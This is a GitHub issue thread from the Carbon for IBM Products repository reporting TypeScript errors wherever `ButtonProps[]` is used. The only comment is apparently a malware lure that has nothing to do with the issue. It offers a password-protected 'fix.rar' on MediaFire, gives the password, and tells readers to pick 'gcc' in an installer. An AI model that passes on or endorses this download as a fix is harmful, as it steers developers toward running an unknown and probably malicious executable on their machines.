### ISSUE TITLE
TypeScript errors anywhere `ButtonProps[]` is used

### ISSUE THREAD

**Issue by matthewgallo** [carbon-design-system/ibm-products#5945]
### Package

Carbon for IBM Products

### Description

There are TypeScript errors anywhere in our library where `ButtonProps[]` is used. 

![image](https://github.com/user-attachments/assets/d74d5729-19e3-4893-a87c-3f4648d2b5ec)

### Component(s) impacted

Components specifying `ButtonProps[]`

### @carbon/ibm-products (previously @carbon/ibm-cloud-cognitive) version

Latest

### Suggested Severity

None

### Product/offering

N/A

### CodeSandbox or Stackblitz example

N/A

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/ibm-products/blob/main/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/ibm-products/issues) for duplicate issues

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
